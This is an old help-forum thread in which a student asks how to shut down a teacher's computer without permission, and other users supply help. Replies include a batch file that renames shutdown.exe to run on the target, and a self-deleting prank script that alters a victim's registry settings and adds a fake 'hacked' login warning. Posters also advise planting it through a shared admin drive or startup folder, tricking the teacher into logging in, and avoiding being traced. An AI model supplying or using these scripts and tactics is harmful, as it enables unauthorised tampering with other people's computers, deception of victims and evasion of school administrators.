My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
Thanks.
Printable View
My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
Thanks.
[QUOTE][i]Originally posted by Unregistered [/i]
[B]My -------- teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
Thanks. [/B][/QUOTE]
*.I need to know if the Operating System is WinXP or W2K
2.Is the computer part of a LAN, is the open session belongs to the admin group?
*.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message
Off hand I would do the following that might evntually work:
*. open with notepad or edit an empty file (on your computer)
2. copy then paste these lines in this file
copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
call abcd*2*4 -s
*. save the file and name it abcd.bat
4. copy this abcd.bat file to the target computer and run the abcd.bat
ABHIS (a guest)
[QUOTE][i]Originally posted by ABHIS [/i]
[B
4. copy this abcd.bat file to the target computer and run the abcd.bat
[/B][/QUOTE]
By the way, if all PCs are connected on LAN (network), simply copy abcd.bat to a shared commun folder accessible all over the network.
Go to the target PC, locate abcd.bat where you put it, hit it (AND RUN) ;)
[QUOTE][i]Originally posted by ABHIS [/i]
[B]*.I need to know if the Operating System is WinXP or W2K
2.Is the computer part of a LAN, is the open session belongs to the admin group?
*.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message
Off hand I would do the following that might evntually work:
*. open with notepad or edit an empty file (on your computer)
2. copy then paste these lines in this file
copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
call abcd*2*4 -s
*. save the file and name it abcd.bat
4. copy this abcd.bat file to the target computer and run the abcd.bat
ABHIS (a guest) [/B][/QUOTE]
The operating system is XP and is connected by LAN.
I attempted to shut it down by shutdown -i and searching for it. I found it, but "Access is Denied" came up. I'm not in there right now, but I'll try it tomorrow and let you know how it worked.
asdfgjkloo
[QUOTE][i]Originally posted by ABHIS [/i]
[B]*.I need to know if the Operating System is WinXP or W2K
2.Is the computer part of a LAN, is the open session belongs to the admin group?
*.what is exactly the command that you typed <i>shutdown -s</i> ??? when you get the "access denied" message
Off hand I would do the following that might evntually work:
*. open with notepad or edit an empty file (on your computer)
2. copy then paste these lines in this file
copy %windir%\system*2\shutdown.exe %windir%\system*2\abcd*2*4.exe
call abcd*2*4 -s
*. save the file and name it abcd.bat
4. copy this abcd.bat file to the target computer and run the abcd.bat
ABHIS (a guest) [/B][/QUOTE]
I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a).
I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.
Put This Under All Users and make her log onto your computer...
SAVE AS WinHelp.BAT and place the file here
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
--------------------------------------------
echo off
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="*" >> c:\reg.reg
echo "MouseSpeed"="*" >> c:\reg.reg
echo "DoubleClickSpeed"="*00" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
echo "Key***rdDelay"="5" >> c:\reg.reg
echo "Key***rdSpeed"="*0" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo "Start Page"="http://www.google.com/" >> c:\reg.reg
echo.
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg
REGEDIT /s c:\reg.reg
start iexplore.exe [url]www.google.com[/url]
start iexplore.exe [url]www.google.com[/url]
start iexplore.exe [url]www.google.com[/url]
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
exit
-------------------------------------
Edited for links.
[QUOTE][i]Originally posted by Unregistered [/i]
[B]I tried it, but it didn't work. It kept trying to shut me down (luckily I know about shutdown -a). [/B][/QUOTE]
Where you able to run the .bat file on the teacher's PC?
I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
It makes all the difference, see why:
In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
They are authenticated by their MD5 (using protection similar to SSM).
When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.
Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
If however this protection exists, I am sure that you won't be even able to run regedit.exe
Can you send me a link so i can read up on the MD5 authentication. I've never heard of it but is sounds like a good way to completely control what kids are doing on the computers. I think the access denied is just b.c of his "user" privledges trying to shutdown another persons computer on a lan... Ive seen the same error trying to shutdown a computer while logged on as a standard user.
Since the TEACHER is logging on to his computer will the MD5 lockdowns still take place if she is an network admin? I'm guessing the MD5 authentication would tie into the Active Directory Server and grant her full permissions once she is logged onto his computer. Hopefully its not on a local base...
[QUOTE][i]Originally posted by ABHIS [/i]
[B]Where you able to run the .bat file on the teacher's PC?
I need to know if "Access is Denied" was related to the newly created .bat file or to the abcd*2*4.exe file.
It makes all the difference, see why:
In most school, corporation (like ours), the admin group limits the access to some selected .exe/dll/bat/..executable program.
They are authenticated by their MD5 (using protection similar to SSM).
When you ask a program to run, the systemm checks its MD5, decides to grant access or not depending on the database autorised programs.
If you insert a CDROM (setup.exe, autorun.exe) or run a new exe or even a new virus, even if you call it by the same name of a previously autorised program, it does not have the same MD5, it will be rejected.
Therefore, in case your newly injected abcd.bat was able to run, means that THERE IS NO PROTECTION based on selected autorised executables.
If however this protection exists, I am sure that you won't be even able to run regedit.exe [/B][/QUOTE]
I didn't open it from her computer. If i could do that, i would just go to Start, Shutdown.
If I put the batch file ABHIS made in [I]her[/I] startup, will it boot up, and shutdown as soon as abcd.bat is accessed?
Same with SyntaX******'s file. Will it open all those websites and mess up her mouse, key***rd and display those lovely little messages as soon as it is started?
If so, that would be fucking hilarious, lmao
One more thing. If I do this and fuck up her computer, will they be able to trace it back to mine?
Thanks, asdfghjkloo
Bad News- You wont be able to put the file in her startup folder ~
UNLESS she has her C:\ drive shared giveing all users permission to it. Test it out to see...
Copy "PathOfFileOnYourComputer" "\\HERIPORCOMPUTERNAME\c$\"
-If this works WOW, copy the file to her startup folder- Expect an Access Denied b.c i really doubt it is shared.
About your conserns... She wont know what happened b.c the file deletes itself after it runs. It also does NO damage. It just tweaks the shit out of windows. I could add some other commands but this is just an old batch i wrote last year. I can make windows do whatever you would like it to do. Just let me know what you want and ill create it.
UNDERSTAND HOW TO RUN THE FILE
------------------------------
*. You do NOT run the file
2. You place the file here on your LOCAL COMPUTER
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
*. You tell her you cant log onto the computer, ask her to help you... Get her to log onto the computer with her own username and password which will automatically start the program as soon as she logs into windows.
[QUOTE][i]Originally posted by SyntaX****** [/i]
[B]Bad News- You wont be able to put the file in her startup folder ~
UNLESS she has her C:\ drive shared giveing all users permission to it. Test it out to see...
Copy "PathOfFileOnYourComputer" "\\HERIPORCOMPUTERNAME\c$\"
-If this works WOW, copy the file to her startup folder- Expect an Access Denied b.c i really doubt it is shared.
About your conserns... She wont know what happened b.c the file deletes itself after it runs. It also does NO damage. It just tweaks the shit out of windows. I could add some other commands but this is just an old batch i wrote last year. I can make windows do whatever you would like it to do. Just let me know what you want and ill create it.
UNDERSTAND HOW TO RUN THE FILE
------------------------------
*. You do NOT run the file
2. You place the file here on your LOCAL COMPUTER
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
*. You tell her you cant log onto the computer, ask her to help you... Get her to log onto the computer with her own username and password which will automatically start the program as soon as she logs into windows. [/B][/QUOTE]
I'm *5% sure her C drive is shared, dumbass, I guess she didn't expect for me to come along :) I've been experimenting with batch files, I think I can make a nice one. Thanks for the help though, I'll ask if I need your help.
Also, in your batch file, what is c:\reg.reg and what does it do?\
Thanks, asdfghjkloo
[QUOTE][i]Originally posted by Unregistered [/i]
[B]Also, in your batch file, what is c:\reg.reg and what does it do?\
[/B][/QUOTE]
The " >> " is a stdin redirection, it means that you are redirecting whatever typed text into --> a file (in this particular case it is called reg.reg located on the root of disk C
you may call it anything else, but in this expl you need to keep the .reg extension.
By the way, DO NOT FORGET to add this line as well at the end of your batch file:
del c:\reg.reg
Add the line BEFORE del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
Because whatever is AFTER this line is completely useless ;)
At school i want to shutdown a friends computer but how do i go about it if i do not have access to command prompt. Is there any way?Or any other programs similar to command prompt that will be allowed?
thanks a lot in advance for your help.
[QUOTE][i]Originally posted by *2*456 [/i]
[B]At school i want to shutdown a friends computer but how do i go about it if i do not have access to command prompt. Is there any way?Or any other programs similar to command prompt that will be allowed?
thanks a lot in advance for your help. [/B][/QUOTE]
You can access the command prompt by:
*. Start, Programs, Accessories, Command Prompt.
2. Click Start and Run. Then type "cmd" (no quotation marks) and hit enter.
*. Open notepad and type start in the document. Save the document as cmd.bat on the desktop (so you can easily delete it after you're through with it) and then run the file.
asdfghjkloo
Sorry about those links DATA -
[QUOTE]By the way, DO NOT FORGET to add this line as well at the end of your batch file:[/QUOTE]
Thanks for catchin that!
My teacher somehow found out that I shutdown one of her computers that is not protected from shutdown -i. She got pissed off! Bad pissed, so she put me in the corner and disabled my internet as well as unpl***ing the network connection. LMAO!! Could she of found out any way other than somebody telling her?
when i try an access command prompt at school it says it is disbaled by administrator. Any ideas how to get his password or get around this so i can use command prompt. Thanks a lot for any help. it is much appreciated (not by the teachers tho)
Nicee one... Got caught on your first try~
[QUOTE][i]Originally posted by Unregistered [/i]
[B]My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?
Thanks. [/B][/QUOTE]
But how did you get into the teacher's computer i mean she or he will be always around their computer.
[QUOTE][i]Originally posted by Unregistered [/i]
[B]You can access the command prompt by:
*. Start, Programs, Accessories, Command Prompt.
2. Click Start and Run. Then type "cmd" (no quotation marks) and hit enter.
*. Open notepad and type start in the document. Save the document as cmd.bat on the desktop (so you can easily delete it after you're through with it) and then run the file.
asdfghjkloo [/B][/QUOTE]
they block batch scripts at school
All it takes is *0 seconds. Pop in a floppy, start up cmd, call the script... Sometimes explorer.exe gets sl***ish if you try to open your floppy drive by clicking to it so do it through your command prompt.
hey syntax****** could u have windows actually create a file in a batch script?
just wondering
i would also like to know someother things to commands to like open things and run things
hey i was having treouble getting my remote shutdown to work it always says network path not found and it wont let me browse for computers
just wondering if u guys (or girls) had any ideas that might help me
all comps are winxp and file sharing enabled and ip adresses allowed in firewalls
thanks again
Google is your friend...
search for poweroff, or download [url]http://users.pandora.be/jbosman/pwroff*0.zip[/url] from here [url]http://users.pandora.be/jbosman/applications.html[/url]
that's all you'll need.
Fu*k them all :-)
Using poweroff can you enter ip addresses into as the remote computer?
Could anyone give me an ip address to test it on?
i know u ppl will think im a complete loser which i am. ive been trying to hack and send virsus scince the 5th grade and i havnt gone anywhere you guys seem smart could anyone plz point me in the right direction where to learn?
[QUOTE]could u have windows actually create a file in a batch script?[/QUOTE]
YeS~ Thats what the script i posted does. It creates a few new registry keys and then silently adds them to your registry.
okay, i'm thinking of this: email yourself cmd.exe, but rather change exe into exec, say if it wouldn't let you download exe files at school. in this way you get a working cmd.exec into that computer and have access to it. you should be able to execute it from the folder in which you downloaded the attachment, after you rename it back to cmd.exe. never did this though, i'm also curious. so if it works pls let me know. cheers!
Hey,
I have a really annoying sister who always uses Audio on MSN messenger every night. Is there any way of creating a BAT file which will close MSN messenger at *0PM and to make sure the MSN messenger cannot be opened again till 6AM. This would be very useful. Or even a BAT file which shuts down the PC at *0PM
Thanks
Gav
[QUOTE][i]Originally posted by Unregistered [/i]
[B]Hey,
I have a really annoying sister who always uses Audio on MSN messenger every night. Is there any way of creating a BAT file which will close MSN messenger at *0PM and to make sure the MSN messenger cannot be opened again till 6AM. This would be very useful. Or even a BAT file which shuts down the PC at *0PM
Thanks
Gav [/B][/QUOTE]
Haha, I think your stretching it a little far there Gav. SyntaX******, can you do it?
syntax i ran the program u posted on my siblings computers and every time i boot then up it says "you have been hacked" how and what do i do to get rid of this problem thanks in advance
[QUOTE][i]Originally posted by Unregistered [/i]
[B]syntax i ran the program u posted on my siblings computers and every time i boot then up it says "you have been hacked" how and what do i do to get rid of this problem thanks in advance [/B][/QUOTE]
This is you lesson NOT to trust anybody and NOT to run any silly application on your PC.
Now syntax will [i](maybe)[/i] send you another shit to fix this problem and screw up some this else.
Note in the mean time that NO DDOS shit was successful at all, otherwise you would have mentioned it.
love to you (and hugs)
so how do i get rid of it i really need to no
thanks
[QUOTE][i]Originally posted by Unregistered [/i]
[B]so how do i get rid of it i really need to no
thanks [/B][/QUOTE]
As far as I can quickly guess:
*. it might be a .bat or an .exe file with a link (.lnk) under here:
>Start > All Programs > Startup --> here you'll see a "weird" name
most probably without an icon!
2. or (even better) it might be just here:
you need to open regedit and find it by yourself under this key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
or under this key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
in all cases, delete the exe file that you received.
cheers ;)
that didnt help much does i need more ideas plz help hes pissed i no i screwed up but i need help
thanks if u have any info i would really like it
thanks again
please help me with this problem of how to get rid of the u have been hacked message at startup
thanks
[QUOTE][i]Originally posted by Unregistered [/i]
[B]please help me with this problem of how to get rid of the u have been hacked message at startup
thanks [/B][/QUOTE]
*. you need to know that I CANNOT provide any help if you do not understand what I am asking.
2. you need to provide details about the message that you are getting:
____a. Is it a message during booting BEFORE that Windows starts (DOS message)?
____b. Is it a message inside a small window AFTER that windows starts. (similar to an error box)
*. Did you check what I asked in my earlier post (here the answer is easy: YES or NO) --> if you do not know ---> go back to step *. ;)
*. what OS are you running Win*x or WinXP?
4. Just for sake of it, have you checked inside your autoexec.bat
ABHIS
I want to appologize for taking a while to reply to your questions. I have been absent from the forum for about a week now.
I will try to answer all of your questions:
[QUOTE]please help me with this problem of how to get rid of the u have been hacked message at startup[/QUOTE]
*. Open your registry regedit.exe
2. Follow this path to the registry key:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
*. Delete the Key With The Unwanted Text (NOT THE FOLDER)
[QUOTE]I have a really annoying sister who always uses Audio on MSN messenger every night.[/QUOTE]
I have a .vbs script just for that purpose. It will actually be a script running in the background that says "IF THE PROCESS %WHATEVER.EXE% START STOP IT IMMEDIATELY" What is the name of the process that runs when you start the messenger? I will add it to the script and post it here.
TO fleetwooDmaC
Why did you run the program that i posted on your siblings computer!? Maybe you should read the posts beforehand so that you know what the program actually does. I wrote the silly program just for fun. It doesnt do any damage but it tweaks all your settings. I posted it for the guy trying to get back at his teacher, not for the general user to run it on their own computer for fun. If you need any settings changed back just let me know which ones and ill tell you how to do it. I appologize again if anyone was confused about what the script did...
DO NOT RUN THE SCRIPT ON YOUR OWN COMPUTER. IT WILL NOT DO ANY DAMAGE BUT IT WILL TWEAK THE SHIOT OUT OF YOUR SETTINGS.